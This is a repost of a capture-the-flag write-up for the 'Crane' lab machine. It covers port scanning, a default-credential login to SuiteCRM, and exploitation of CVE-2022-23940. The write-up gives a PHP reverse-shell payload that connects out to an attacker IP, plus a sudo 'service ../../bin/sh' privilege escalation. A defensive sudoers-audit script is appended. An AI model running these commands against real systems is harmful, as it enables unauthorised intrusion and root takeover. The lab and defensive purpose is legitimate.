PG_Crane

admin, 2025-03-24 21:32:06

Information gathering:

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.146
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-22 18:44 CST
Nmap scan report for 192.168.216.146
Host is up (0.0077s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA)
|   256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA)
|_  256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: SuiteCRM
|_Requested resource was index.php?action=Login&module=Users
3306/tcp  open  mysql   MySQL (unauthorized)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"

|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 995/tcp)
HOP RTT     ADDRESS
1   4.66 ms 192.168.45.1
2   4.66 ms 192.168.45.254
3   4.74 ms 192.168.251.1
4   4.91 ms 192.168.216.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.61 seconds

Port 80 (HTTP) is open, and robots.txt discloses a disallowed path.


Searching for exploits turns up a vulnerability that allows RCE, but it requires authentication.


Trying admin/admin logs in successfully.


Modify the contents of the exploit script.


Running the sh reverse shell directly failed, probably a VPN issue. Looking up the vulnerability, CVE-2022-23940, I switched to a different script:

https://github.com/manuelz120/CVE-2022-23940

python3 exploit.py -h http://192.168.216.146/ -u admin -p admin --payload "php -r '$sock=fsockopen("192.168.45.184", 3000); exec("/bin/sh -i <&3 >&3 2>&3");'"

Successfully got a shell.


Obtained the local flag.


Routine post-exploitation enumeration:

find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
sudo -l

sudo -l shows that service can be run through sudo without a password.

sudo /usr/sbin/service ../../bin/sh

Obtained the proof flag.
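The sudo rule abused above is dangerous because /usr/sbin/service is listed with no arguments, so sudo accepts any argument, including a relative path in place of a service name. The audit script below is added here and is not part of the original post: it parses sudoers-style rules (a constructed sample is embedded, with the weak rule next to an argument-restricted one) and flags ALL grants or shell-capable binaries allowed with unrestricted arguments; the SHELL_CAPABLE list and the sample user names are assumptions.

```python
import re

# Binaries that run an arbitrary program when sudo allows them with any argument.
# `service` is the one used in this writeup; the rest are illustrative (assumption).
SHELL_CAPABLE = {"service", "vim", "less", "find", "awk", "env", "bash", "sh"}
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
# user host=(runas) [TAG:] cmd, [TAG:] cmd, ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)

# Constructed sample sudoers, not the target's real file: the www-data rule mirrors the
# weak one in the writeup; the deploy rule pins the arguments so no path can replace the service name.
SAMPLE_SUDOERS = """\
Defaults env_reset
www-data ALL=(ALL) NOPASSWD: /usr/sbin/service
deploy   ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart, /usr/sbin/service apache2 reload
backup   ALL=(ALL) ALL
"""

def parse_rule(line):
    """Return (user, runas, [(nopasswd, command), ...]) or None for non-rule lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    entries, nopasswd = [], False  # a tag persists across the rest of the command list
    for spec in m.group("cmds").split(","):
        spec = spec.strip()
        while ":" in spec and spec.split(":", 1)[0].isupper():  # NOPASSWD:, SETENV:, ...
            tag, spec = (s.strip() for s in spec.split(":", 1))
            nopasswd = tag == "NOPASSWD" or (nopasswd and tag != "PASSWD")
        if spec:  # skip empty entries left by a trailing comma
            entries.append((nopasswd, spec))
    return m.group("user"), m.group("runas") or "root", entries


def risky_rules(sudoers_text):
    """Flag rules granting ALL, or a shell-capable binary with unrestricted arguments."""
    findings = []
    for user, runas, entries in filter(None, map(parse_rule, sudoers_text.splitlines())):
        for nopasswd, cmd in entries:
            parts = cmd.split()
            binary = parts[0].rsplit("/", 1)[-1]
            unrestricted = len(parts) == 1 or parts[1] == "*"  # no args listed, or wildcard
            if cmd == "ALL" or (binary in SHELL_CAPABLE and unrestricted):
                findings.append({"user": user, "runas": runas, "cmd": cmd, "nopasswd": nopasswd})
    return findings
```

Run risky_rules over the text of /etc/sudoers and the files under /etc/sudoers.d to list rules worth tightening; on the sample it flags the www-data and backup rules and leaves the deploy rule alone.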


Originally published on the WeChat public account EuSRC Security Lab (EuSRC安全实验室): PG_Crane

Reposted via CN-SEC: https://cn-sec.com/archives/3880540.html